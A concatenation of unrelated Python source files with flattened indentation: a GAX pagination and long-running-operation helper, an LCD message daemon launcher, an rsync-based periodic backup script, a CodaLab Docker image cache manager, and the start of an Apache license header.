None if a call has not yet been made.
page_token: The page token to be passed in the request for the next call
to be made.
"""
# pylint: disable=too-few-public-methods
def __init__(self, api_call, page_descriptor, page_token, request, **kwargs):
"""Constructor.
Args:
api_call (callable[[req], resp]): an API call that is page
streaming.
page_descriptor (:class:`PageDescriptor`): indicates the structure
of page streaming to be performed.
page_token (str): The page token to be passed to API call request.
If no page token has yet been acquired, this field should be set
to ``INITIAL_PAGE``.
request (object): The request to be passed to the API call. The page
token field of the request is overwritten by the ``page_token``
passed to the constructor, unless ``page_token`` is
``INITIAL_PAGE``.
**kwargs: Arbitrary keyword arguments to be passed to the API call.
Returns:
A PageIterator object.
"""
self.response = None
self.page_token = page_token or INITIAL_PAGE
self._func = api_call
self._page_descriptor = page_descriptor
self._request = request
self._kwargs = kwargs
self._done = False
def __iter__(self):
return self
def next(self):
"""For Python 2.7 compatibility; see __next__."""
return self.__next__()
def __next__(self):
"""Retrieves the next page."""
if self._done:
raise StopIteration
if self.page_token != INITIAL_PAGE:
setattr(self._request,
self._page_descriptor.request_page_token_field,
self.page_token)
response = self._func(self._request, **self._kwargs)
self.page_token = getattr(
response, self._page_descriptor.response_page_token_field)
if not self.page_token:
self._done = True
return getattr(response, self._page_descriptor.resource_field)
class ResourceIterator(object):
"""An iterator over resources of the page iterator."""
# pylint: disable=too-few-public-methods
def __init__(self, page_iterator):
"""Constructor.
Args:
page_iterator (PageIterator): the base iterator of getting pages.
"""
self._page_iterator = page_iterator
self._current = None
self._index = -1
def __iter__(self):
return self
def next(self):
"""For Python 2.7 compatibility; see __next__."""
return self.__next__()
def __next__(self):
"""Retrieves the next resource."""
# pylint: disable=next-method-called
while not self._current:
self._current = next(self._page_iterator)
self._index = 0
resource = self._current[self._index]
self._index += 1
if self._index >= len(self._current):
self._current = None
return resource
def _from_any(pb_type, any_pb):
"""Converts an Any protobuf to the specified message type
Args:
pb_type (type): the type of the message that any_pb stores an instance
of.
any_pb (google.protobuf.any_pb2.Any): the object to be converted.
Returns:
An instance of the pb_type message.
"""
msg = pb_type()
# Check exceptional case: raise if can't Unpack
if not any_pb.Unpack(msg):
raise TypeError(
'Could not convert {} to {}'.format(
any_pb.__class__.__name__, pb_type.__name__))
# Return expected message
return msg
def _try_callback(target, clbk):
try:
clbk(target)
except Exception as ex: # pylint: disable=broad-except
_LOG.exception(ex)
class _DeadlineExceededError(RpcError, GaxError):
def __init__(self):
super(_DeadlineExceededError, self).__init__('Deadline Exceeded')
def code(self): # pylint: disable=no-self-use
"""Always returns StatusCode.DEADLINE_EXCEEDED"""
return StatusCode.DEADLINE_EXCEEDED
class _OperationFuture(object):
"""A Future which polls a service for completion via OperationsClient."""
def __init__(self, operation, client, result_type, metadata_type,
call_options=None):
"""Constructor.
Args:
operation (google.longrunning.Operation): the initial long-running
operation object.
client (google.gapic.longrunning.operations_client.OperationsClient):
a client for the long-running operation service.
result_type (type): the class type of the result.
metadata_type (type, optional): the class type of the metadata.
call_options (google.gax.CallOptions, optional): the call options
that are used when reloading the operation.
"""
self._operation = operation
self._client = client
self._result_type = result_type
self._metadata_type = metadata_type
self._call_options = call_options
self._queue = mp.Queue()
self._process = None
def cancel(self):
"""If last Operation's value of `done` is true, returns false;
otherwise, issues OperationsClient.cancel_operation and returns true.
"""
if self.done():
return False
self._client.cancel_operation(self._operation.name)
return True
def result(self, timeout=None):
"""Enters polling loop on OperationsClient.get_operation, and once
Operation.done is true, then returns Operation.response if successful or
throws GaxError if not successful.
This method will wait up to timeout seconds. If the call hasn't
completed in timeout seconds, then a RetryError will be raised. timeout
can be an int or float. If timeout is not specified or None, there is no
limit to the wait time.
"""
# Check exceptional case: raise if no response
if not self._poll(timeout).HasField('response'):
raise GaxError(self._operation.error.message)
# Return expected result
return _from_any(self._result_type, self._operation.response)
def exception(self, timeout=None):
"""Similar to result(), except returns the exception if any."""
# Check exceptional case: return none if no error
if not self._poll(timeout).HasField('error'):
return None
# Return expected error
return self._operation.error
def cancelled(self):
"""Return True if the call was successfully cancelled."""
self._get_operation()
return (self._operation.HasField('error') and
self._operation.error.code == code_pb2.CANCELLED)
def done(self):
"""Issues OperationsClient.get_operation and returns value of
Operation.done.
"""
return self._get_operation().done
def add_done_callback(self, fn): # pylint: disable=invalid-name
"""Enters a polling loop on OperationsClient.get_operation, and once the
operation is done or cancelled, calls the function with this
_OperationFuture. Added callables are called in the order that they were
added.
"""
if self._operation.done:
_try_callback(self, fn)
else:
self._queue.put(dill.dumps(fn))
if self._process is None:
self._process = mp.Process(target=self._execute_tasks)
self._process.start()
def operation_name(self):
"""Returns the value of Operation.name."""
return self._operation.name
def metadata(self):
"""Returns the value of Operation.metadata from the last call to
OperationsClient.get_operation (or if only the initial API call has been
made, the metadata from that first call).
"""
# Check exceptional case: return none if no metadata
if not self._operation.HasField('metadata'):
return None
# Return expected metadata
return _from_any(self._metadata_type, self._operation.metadata)
def last_operation_data(self):
"""Returns the data from the last call to OperationsClient.get_operation
(or if only the initial API call has been made, the data from that first
call).
"""
return self._operation
def _get_operation(self):
if not self._operation.done:
self._operation = self._client.get_operation(
self._operation.name, self._call_options)
return self._operation
def _poll(self, timeout=None):
def _done_check(_):
# Check exceptional case: raise if in progress
if not self.done():
raise _DeadlineExceededError()
# Return expected operation
return self._operation
if timeout is None:
backoff_settings = BackoffSettings(
1000, 2, 30000, None, None, None, None)
else:
backoff_settings = BackoffSettings(
1000, 2, 30000, 0, 0, 0, timeout * _MILLIS_PER_SEC)
retry_options = RetryOptions(
[StatusCode.DEADLINE_EXCEEDED], backoff_settings)
retryable_done_check = retryable(_done_check, retry_options)
return retryable_done_check()
def _execute_tasks(self):
self._poll()
while not self._queue.empty():
task = dill.loads(self._queue.get())
_try_callback(self, task)
|
lcddaemon.py
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
""" This script is the launcher of the daemon.
"""
import sys
import threading
from core.daemonargs import parse_arguments
from core.message import Message
from core.message import set_default_repeat
from core.message import set_default_ttl
from core.message import set_default_duration
from core.queue import MessageQueue
from core.queuemanager import QueueManager
from core.loader import load_module_from_conf
from core.loader import load_driver_from_conf
from core.loader import load_animation_from_conf
from server.server import run
from server.server import shutdown
driver = None
def main():
global driver
# Parse args from cmd.
config = parse_arguments()
# Set default values.
set_default_repeat(config["ttr"])
set_default_ttl(config["ttl"])
set_default_duration(config["ttd"])
# Create the message queue.
message_queue = MessageQueue(config["limit"])
# Load module, driver and animation according to args.
module_class = load_module_from_conf(config)
driver_class = load_driver_from_conf(config)
driver = driver_class()
animation_class = load_animation_from_conf(config)
animation = animation_class(driver)
# Create the message manager and start the thread.
message_manager = QueueManager(message_queue, module_class, animation)
message_manager_thread = threading.Thread(target=message_manager.manage)
message_manager_thread.daemon = True
message_manager_thread.start()
# Start the web server.
webserver_thread = threading.Thread(target=run, args=(message_queue, config["ptl"]))
webserver_thread.daemon = True
webserver_thread.start()
# Advertise user that everything is working:
# In cmd.
print("Daemon ready!")
# On the screen.
started_message = Message("Daemon ready!", "lcd_daemon", 1, 1, 5, {})
message_queue.put(started_message, verbose=False)
webserver_thread.join()
if __name__ == '__main__':
try:
main()
except Exception as e:
print("An exception occurs, here are some details:")
# Print informations about the exception.
exc_type, exc_obj, exc_tb = sys.exc_info()
file_name = exc_tb.tb_frame.f_code.co_filename
print("- Exception type: "+e.__class__.__name__)
print("- File name: "+file_name)
print("- Line no: "+str(exc_tb.tb_lineno))
finally:
# Shutdown the server and advertise the user.
# In cmd.
print("Shutting down...")
# On the screen.
if driver != None: # Only do it if the screen has been used already.
driver.clear()
driver.write_lines(("Shutting down...",))
shutdown()
# Advertise user that the daemon is stopped:
# In cmd.
print("Daemon stopped!")
# On the screen.
if driver != None: # Only do it if the screen has been used already.
driver.clear()
driver.write_lines(("Daemon stopped!",))
sys.exit(0)
|
do_backup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
A script doing periodical backup.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
from datetime import datetime, timedelta
import dateutil.relativedelta
from logging import getLogger, StreamHandler, Formatter, NullHandler
from logging import DEBUG, WARN
from logging.handlers import RotatingFileHandler
import os
import os.path
import platform
import subprocess
import shlex
import shutil
import stat
import sys
import threading
import time
import traceback
if sys.version_info[0] == 3:
unicode = str
Version = '3.7.0'
_FULL_BACKUP_INTERVAL = 30
_DEFAULT_DIR = '/mnt/disk0/backup'
_DEFAULT_DIR_FORMAT = '{hostname}-%Y%m%d'
_DEFAULT_DIR_FORMAT_HOURLY = '{hostname}-%Y%m%d-%H'
# Tries to remove backups those are older than this count (days or hours).
# This script relies on the assumption that old backups keep
# same directory name structure specified by dir-format.
# If a user changes the directory name format,
# this script will just fail to detect/delete old backups.
_DEFAULT_REMOVAL_THRESHOLD = 31
# This script looks for old directories until this index.
_DEFAULT_REMOVAL_SEARCH_THRESHOLD = 100
_DEFAULT_INCLUDED_DIR = []
_DEFAULT_EXCLUDED_DIR = ['/dev', '/proc', '/sys', '/tmp',
'/mnt', '/media', '/root', '/run',
'/lost+found',
'/var/lock', '/var/tmp', '/var/run',
'/backup']
_null_logger = getLogger('null')
_null_logger.addHandler(NullHandler())
_null_logger.propagate = False
class AppException(Exception):
pass
def _parse_args():
parser = argparse.ArgumentParser(
description=('Do backup to (another) local disk.'))
parser.add_argument('src', metavar='SRC',
type=str,
nargs='+')
parser.add_argument('-b', '--base-dir',
action='store',
type=str,
help=('Base directory for destination under which'
' a directory for each backup will'
' be prepared.'),
default=_DEFAULT_DIR)
parser.add_argument('--dir-format',
action='store',
type=str,
help=('Directory format for each daily backup.'),
default=_DEFAULT_DIR_FORMAT)
parser.add_argument('-i', '--identity-file',
type=str,
help='Let ssh use this private key.')
parser.add_argument('-f', '--force-full-backup',
action='store_true',
help=('Do not use --link-dest even when precedeng'
' backup directory exists, consuming much more'
' disk possibly.'))
parser.add_argument('-r', '--removal-threshold',
action='store',
type=int,
help=(('Specifies until when this script keeps'
' old backups.'
' If this value is set to {example}'
' for example, backups {example} days ago'
' will be kept but backups before that date'
' will be removed.'
' 0 or less means no removal.')
.format(example=_DEFAULT_REMOVAL_THRESHOLD)),
default=_DEFAULT_REMOVAL_THRESHOLD)
parser.add_argument('--hourly',
action='store_true',
help=('Relevant operations will be applied'
' on an hourly basis.'))
parser.add_argument('-e', '--exclude',
action='append',
type=str,
help=('Files(dirs) that should be excluded'
' in addition to default exclusion list.'))
parser.add_argument('--exclude-from',
action='store',
type=str,
help=("A file specifying files(dirs) to be ignored."))
parser.add_argument('--include',
action='append',
type=str,
help=('Files(dirs) that should be included'
' as backup.'
' Note --include is prioritized over'
' --exclude.'))
parser.add_argument('--log',
action='store',
type=str,
help='Log level like DEBUG/INFO/WARN',
default='INFO')
parser.add_argument('-d', '--debug', action='store_true',
help='Shortcut for --log DEBUG')
parser.add_argument('-w', '--warn', action='store_true',
help='Shortcut for --log WARN')
parser.add_argument('-l', '--log-rsync-output', action='store_true',
help='Include rsync output to DEBUG log')
parser.add_argument('--verbose-rsync', action='store_true',
help='Set --verbose option to rsync')
parser.add_argument('--verbose-log-file',
action='store',
type=str,
help=('If specified, store all DEBUG logs into'
' the file. The log file\'s log level'
' is not affected by --log or relevant'
' log-level options.'))
parser.add_argument('-t', '--src-type',
action='store',
type=str,
default='local',
help='Can Specify "local", "ssh", or "rough"')
parser.add_argument('-c', '--rsync-command', default='rsync',
help='Exact command name to use')
parser.add_argument('--rsync-bwlimit', metavar='KBPS',
help='Value for rsync\'s --bwlimit option')
parser.add_argument('-v', '--version',
action='version',
version='{}'.format(Version),
help='Show version and exit')
args = parser.parse_args()
return args
def _get_backup_dir_path(thatday, base_dir, dir_format):
return os.path.join(base_dir, _get_backup_dir_name(thatday, dir_format))
def _get_backup_dir_name(thatday, dir_format):
return thatday.strftime(dir_format.format(
hostname=platform.node()))
def _is_permission_error(e):
"""\
受け取った例外がアクセス権限のものであればTrue、そうでなければFalseを返す
"""
# See PEP 3151
if sys.version_info[0:2] < (3, 2):
return (isinstance(e, OSError) or isinstance(e, IOError)
and e.args[0] == 13)
else:
return isinstance(e, PermissionError)
def _del_rw(function, path, exc_info, logger=None):
"""\
ディレクトリツリー上でpathの親以上にあたるディレクトリを
ルートから辿り、アクセス権限があるかを確認する。
また親ディレクトリについては書き込み権限があることを確認する。
この関数はshutil.rmtree()のonerrorキーワード引数に与えられることを
前提にしている。functionは例外を送出した関数、
path は function に渡されたパス名、
exc_info は (type, value, traceback) となる。
loggerを使用する場合は、rmtree()のonerrorに
lambda a, b, c: _del_rw(a, b, c, logger=logger)
などと指定すれば良い。
"""
logger = logger or _null_logger
if _is_permission_error(exc_info[1]):
logger.debug('Permission denied found (path: "{}", exc_info: {}).'
' Try fixing the permission.'
.format(path, exc_info))
# 消せない理由は親以上のディレクトリにアクセス権限がないか
# 親が書き込み不可能か。
# よってルートから順番に書き込み権限を強制付与する。
# ただし、ルート付近は別ユーザ(root等)のディレクトリのはずなので
# アクセスビットを立てる前に自分がオーナーであるディレクトリかを
# チェックする
target_dirs_stack = []
parent_dir_path = os.path.dirname(path)
cur_path = parent_dir_path
while cur_path != '/':
target_dirs_stack.append(cur_path)
cur_path = os.path.dirname(cur_path)
while target_dirs_stack:
cur_path = target_dirs_stack.pop()
if not os.access(cur_path, os.X_OK):
logger.debug('"{}" is not accessible. Try modifying it.'
.format(cur_path))
if os.geteuid() == os.stat(cur_path).st_uid:
os.chmod(cur_path,
os.stat(cur_path).st_mode | stat.S_IXUSR)
else:
logger.error('Unable to access "{}" while the owner'
' is different from current user (euid: {})'
.format(cur_path, os.geteuid()))
raise exc_info[1]
if (cur_path == parent_dir_path
and not (os.stat(cur_path).st_mode & stat.S_IWUSR)):
logger.debug('"{}" is not writable. Try modifying it.'
.format(cur_path))
os.chmod(cur_path,
os.stat(cur_path).st_mode | stat.S_IWUSR)
function(path)
logger.debug('Successfully fixed permission problem (path: {})'
.format(path))
else:
logger.debug('Unacceptable exception (exc_info: {})'.format(exc_info))
raise exc_info[1]
def _remove_old_backups_if_exist(today, base_dir, dir_format,
first_index, last_index, hourly,
logger=None):
logger = logger or _null_logger
for i in range(first_index, last_index + 1):
if hourly:
thatday = today - timedelta(hours=i)
else:
thatday = today - timedelta(days=i)
dir_path = _get_backup_dir_path(thatday, base_dir, dir_format)
if os.path.exists(dir_path):
if not os.path.isdir(dir_path):
logger.warn('{} is not a directory. Ignoring.'
.format(dir_path))
continue
logger.info('Removing old backup "{}"'.format(dir_path))
shutil.rmtree(dir_path,
onerror=lambda a, b, c: _del_rw(a, b, c,
logger=logger))
logger.debug('Finished removing "{}"'.format(dir_path))
else:
# 流石に少しverboseすぎる
# logger.debug('"{}" does not exist.'.format(dir_path))
pass
def _find_link_dir(today, base_dir, dir_format,
first_index, last_index, is_hourly_backup,
logger=None):
"""\
Finds the directory that will be used with --link-dest option.
"""
logger = logger or _null_logger
for i in range(first_index, last_index + 1):
if is_hourly_backup:
thatday = today - timedelta(hours=i)
else:
thatday = today - timedelta(days=i)
dir_path = _get_backup_dir_path(thatday, base_dir, dir_format)
if os.path.isdir(dir_path):
return dir_path
return None
def _log_thread(file_in, logger, prefix):
for line in iter(file_in.readline, b''):
uni_line = unicode(line, encoding='utf-8', errors='replace')
msg = prefix + uni_line.rstrip()
logger.debug(msg)
def _construct_rsync_opts(args, link_dir_path, included_dirs, excluded_dirs,
logger=None):
logger = logger or _null_logger
if args.src_type == 'ssh':
# Note: do not rely on archive mode (-a)
rsync_opts = ['-irtlz', '--delete', '--no-specials', '--no-devices']
elif args.src_type == 'rough':
# "Rough" backup, meaning you just want to preserve file content, while
# you don't care much about permission, storage usage, etc.
rsync_opts = ['-irtL', '--no-specials', '--no-devices']
else:
rsync_opts = ['-iaAHXLu', '--delete', '--no-specials', '--no-devices']
if args.verbose_rsync:
rsync_opts.append('--verbose')
if link_dir_path:
rsync_opts.append('--link-dest={}'.format(link_dir_path))
rsync_opts.extend(map(lambda x: '--include ' + x, included_dirs))
rsync_opts.extend(map(lambda x: '--exclude ' + x, excluded_dirs))
if args.exclude_from:
rsync_opts.append(args.exclude_from)
if args.identity_file:
if not os.path.exists(args.identity_file):
err_msg = ('Identity file "{}" does not exist.'
.format(args.identity_file))
raise AppException(err_msg)
rsync_opts.append('-e "ssh -i {}"'.format(args.identity_file))
if args.rsync_bwlimit:
rsync_opts.append('--bwlimit "{}"'.format(args.rsync_bwlimit))
return rsync_opts
def _do_actual_backup(src_list, dest_dir_path, link_dir_path,
included_dirs, excluded_dirs, logger, args):
'''
Returns exit status code of rsync command.
'''
cmd_base = args.rsync_command
rsync_opts = _construct_rsync_opts(args, link_dir_path,
included_dirs, excluded_dirs,
logger=logger)
cmd = '{} {} {} {}'.format(cmd_base, ' '.join(rsync_opts),
' '.join(src_list), dest_dir_path)
logger.debug('Running: {}'.format(cmd))
if args.log_rsync_output:
t_logger = logger
else:
t_logger = _null_logger
exec_args = shlex.split(cmd)
stdout_thread = None
stderr_thread = None
try:
# Start executing rsync and track its output asynchronously.
# Two separate threads will do that job.
p = subprocess.Popen(exec_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_args = (p.stdout, t_logger, '{}(stdout): '.format(exec_args[0]))
stderr_args = (p.stderr, t_logger, '{}(stderr): '.format(exec_args[0]))
stdout_thread = threading.Thread(target=_log_thread, args=stdout_args)
stderr_thread = threading.Thread(target=_log_thread, args=stderr_args)
stdout_thread.start()
stderr_thread.start()
p.wait()
# Note: rsync itself mostly exist with non-0 status code,
# so the caller won't need to check this code anyway.
return p.returncode
finally:
logger.debug('Waiting for threads\' exiting.')
if stdout_thread:
stdout_thread.join()
if stderr_thread:
stderr_thread.join()
logger.debug('Confirmed threads exited.')
def _main_inter(args, logger):
if args.hourly:
if args.dir_format == _DEFAULT_DIR_FORMAT:
logger.debug('Automatically switch to "hourly" dir_format ("{}")'
.format(_DEFAULT_DIR_FORMAT_HOURLY))
args.dir_format = _DEFAULT_DIR_FORMAT_HOURLY
else:
# If the user changes the format, check if the new version
# contains "%H"
if '%H' not in args.dir_format:
logger.warn('dir_format does not contain %H while --hourly'
' option is specified')
org_base_dir = args.base_dir
norm_base_dir = os.path.normpath(args.base_dir)
logger.debug('Normalized base_dir: "{}"'.format(norm_base_dir))
if args.base_dir == "/":
logger.error("base-dir looks root to me ({})"
.format(args.base_dir))
return False
if os.path.exists(norm_base_dir):
# If base_dir exists, check if it is a writable directory.
if not os.path.isdir(norm_base_dir):
logger.error('Path "{}" is not a directory'
.format(org_base_dir))
return False
if not os.access(norm_base_dir, os.W_OK):
logger.error('Directory "{}" is not writable'
.format(org_base_dir))
logger.debug('Directory "{}" exists and writable.'
.format(org_base_dir))
else:
logger.info('Directory "{}" does not exist. Creating it.'
.format(org_base_dir))
# If base_dir does not exists, check parent's dir.
# If parent's dir exists, try creating base_dir.
parent_dir = os.path.dirname(norm_base_dir)
if (not os.path.exists(parent_dir)
or not os.path.isdir(parent_dir)):
logger.error('Parent dir "{}" is not accessible'
.format(parent_dir))
return False
os.mkdir(args.base_dir)
if args.base_dir == "/":
logger.error("base-dir looks root to me ({})".format(args.base_dir))
return False
today = datetime.today()
src_str = ', '.join(map(lambda x: '"{}"'.format(x), args.src))
dest_dir_path = _get_backup_dir_path(today, args.base_dir, args.dir_format)
logger.debug('Backup {} to "{}"'.format(src_str, dest_dir_path))
if args.removal_threshold > 0:
logger.debug('Remove old backups if exist (threshold: {})'
.format(args.removal_threshold))
first_index = args.removal_threshold + 1
last_index = _DEFAULT_REMOVAL_SEARCH_THRESHOLD
_remove_old_backups_if_exist(today, args.base_dir, args.dir_format,
first_index, last_index,
args.hourly, logger=logger)
if args.force_full_backup:
logger.debug('Force full-backup')
else:
link_dir_path = _find_link_dir(today, args.base_dir, args.dir_format,
1, args.removal_threshold, args.hourly,
logger=logger)
if link_dir_path:
logger.debug('Will hardlink to "{}" with --link-dest'
.format(link_dir_path))
else:
logger.debug('Did not found a precedent backup.'
' Will do full-backup')
included_dirs = _DEFAULT_INCLUDED_DIR
if args.include:
included_dirs.extend(args.include)
excluded_dirs = _DEFAULT_EXCLUDED_DIR
if args.exclude:
excluded_dirs.extend(args.exclude)
logger.debug('included files: {}'.format(', '.join(included_dirs)))
logger.debug('excluded files: {}'.format(', '.join(excluded_dirs)))
exit_code = _do_actual_backup(args.src, dest_dir_path, link_dir_path,
included_dirs, excluded_dirs, logger, args)
# On most cases, "ret" will never be 0 (Success), since rsync reports
# failure when even a single file copy fails.
# Here, we want to know if the rsync connection is established
# (i.e. if the target server is alive).
# Ok values (see also rsync(1))
# 0 ... Success
# 23 ... Partial transfer due to error
if exit_code not in [0, 23]:
logger.error('Exit code of rsync is not acceptable (code: {})'
.format(exit_code))
return False
return True
def _get_human_readable_time(elapsed):
rd = dateutil.relativedelta.relativedelta(microseconds=elapsed*1000000)
# Based on http://stackoverflow.com/questions/6574329/
attrs = ['years', 'months', 'days', 'hours', 'minutes', 'seconds']
def human_readable(delta):
return ['%d %s' % (getattr(delta, attr),
getattr(delta, attr) > 1
and attr or attr[:-1])
for attr in attrs if getattr(delta, attr)]
return ' '.join(human_readable(rd))
def main():
args = _parse_args()
logger = getLogger(__name__)
handler = StreamHandler()
handler.setLevel(args.log)
logger.addHandler(handler)
if args.debug:
logger.setLevel(DEBUG)
handler.setLevel(DEBUG)
elif args.warn:
logger.setLevel(WARN)
handler.setLevel(WARN)
else:
logger.setLevel(args.log)
handler.setLevel(args.log)
if args.verbose_log_file:
log_file = args.verbose_log_file
log_dir = os.path.dirname(log_file)
if os.path.isdir(log_file):
logger.error('{} is a directory'.format(log_file))
return
# If the user has no appropriate permission, exit.
if not (os.path.exists(log_dir)
and os.path.isdir(log_dir)
and os.access(log_dir, os.W_OK)
and (not os.path.exists(log_file)
or os.access(log_file, os.W_OK))):
logger.error('No permission to write to {}'
.format(log_file))
return
file_handler = RotatingFileHandler(log_file,
encoding='utf-8',
maxBytes=30*1024*1024,
backupCount=5)
formatter = Formatter('%(asctime)s - %(levelname)s - %(message)s')
file_handler.setFormatter(formatter)
logger.setLevel(DEBUG)
file_handler.setLevel(DEBUG)
logger.addHandler(file_handler)
start_time = time.time()
successful = False
logger.info("Start running at {} ({} with Python {})"
.format(datetime.fromtimestamp(start_time).isoformat(),
Version, platform.python_version()))
logger.debug("Detailed Python version: {}"
.format(sys.version.replace('\n', ' ')))
logger.debug("src-type: {}".format(args.src_type))
try:
successful = _main_inter(args, logger)
except KeyboardInterrupt:
logger.error('Keyboard-interrupted. Exitting.')
return
except Exception:
logger.error(traceback.format_exc())
raise
end_time = time.time()
if successful:
logger.info('Finished running successfully at {}'
.format(datetime.fromtimestamp(end_time).isoformat()))
else:
logger.error('Failed running (ended at {})'
.format(datetime.fromtimestamp(end_time).isoformat()))
elapsed = end_time - start_time
human_readable = _get_human_readable_time(elapsed)
if human_readable:
logger.info('Elapsed: {:.3f} sec ({})'.format(elapsed, human_readable))
else:
logger.info('Elapsed: {:.3f} sec'.format(elapsed))
if __name__ == '__main__':
main()
|
docker_image_manager.py
|
from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from codalabworker.fsm import DependencyStage
from codalabworker.state_committer import JsonStateCommitter
from codalabworker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string, DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant about caching about docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
def __init__(self, commit_file, max_image_cache_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env() # type: DockerClient
self._image_cache = {} # type: Dict[str, ImageCacheEntry]
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._lock = threading.RLock()
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
self._load_state()
def _save_state(self):
with self._lock:
self._state_committer.commit(self._image_cache)
def _load_state(self):
with self._lock:
self._image_cache = self._state_committer.load()
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
self._save_state()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about
2. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
in case no images share any intermediate layers, this will be the real disk use,
however if images share layers, the virtual size will count that layer's size for each
image that uses it, even though it's stored only once in the disk. The 'Size' field
accounts for the marginal size each image adds on top of the shared layers, but summing
those is not accurate either since the shared base layers need to be counted once to get
the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
use of images). Calling df gives us an accurate disk use of ALL the images on the machine
but because of (1) we don't want to use that.
"""
while not self._stop:
deletable_entries = set(self._image_cache.values())
disk_use = sum(cache_entry.virtual_size for cache_entry in deletable_entries)
while disk_use > self._max_image_cache_size:
entry_to_remove = min(deletable_entries, key=lambda entry: entry.last_used)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
disk_use,
self._max_image_cache_size,
entry_to_remove.digest,
)
try:
image_to_delete = self._docker.images.get(entry_to_remove.id)
tags_to_delete = image_to_delete.tags
for tag in tags_to_delete:
self._docker.images.remove(tag)
# if we successfully removed the image also remove its cache entry
del self._image_cache[entry_to_remove.digest]
except docker.errors.NotFound:
# image doesn't exist anymore for some reason, stop tracking it
del self._image_cache[entry_to_remove.digest]
except docker.errors.APIError as err:
# Maybe we can't delete this image because its container is still running
# (think a run that takes 4 days so this is the oldest image but still in use)
# In that case we just continue with our lives, hoping it will get deleted once
# it's no longer in use and the cache becomes full again
logger.error(
"Cannot remove image %s from cache: %s", entry_to_remove.digest, err
)
deletable_entries.remove(entry_to_remove)
disk_use = sum(entry.virtual_size for entry in deletable_entries)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
Request the docker image for the run with uuid, registering uuid as a dependent of this docker image
:param image_spec: Repo image_spec of docker image being requested
:returns: A DockerAvailabilityState object with the state of the docker image
"""
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
# Hence, we append the latest tag to the image spec if there's no tag specified otherwise at the very beginning
image_spec += ':latest'
try:
image = self._docker.images.get(image_spec)
digests = image.attrs.get('RepoDigests', [image_spec])
if len(digests) == 0:
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.FAILED,
message='No digest available for {}, probably because it was built locally; delete the Docker image on the worker and try again'.format(
image_spec
),
)
digest = digests[0]
with self._lock:
self._image_cache[digest] = ImageCacheEntry(
id=image.id,
digest=digest,
last_used=time.time(),
virtual_size=image.attrs['VirtualSize'],
marginal_size=image.attrs['Size'],
)
# We can remove the download thread if it still exists
if image_spec in self._downloading:
self._downloading.remove(image_spec)
return ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message='Image ready'
)
except docker.errors.ImageNotFound:
return self._pull_or_report(image_spec) # type: DockerAvailabilityState
except Exception as ex:
return ImageAvailabilityState(
digest=None, stage=DependencyStage.FAILED, message=str(ex)
)
def _pull_or_report(self, image_spec):
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
digest = self._docker.images.get(image_spec).attrs.get(
'RepoDigests', [image_spec]
)[0]
status = ImageAvailabilityState(
digest=digest,
stage=DependencyStage.READY,
message=self._downloading[image_spec]['message'],
)
else:
status = ImageAvailabilityState(
digest=None,
stage=DependencyStage.FAILED,
message=self._downloading[image_spec]['message'],
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
self._downloading[image_spec]['message'] = "Can't download image: {}".format(ex)
self._downloading.add_if_new(image_spec, threading.Thread(target=download, args=[]))
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
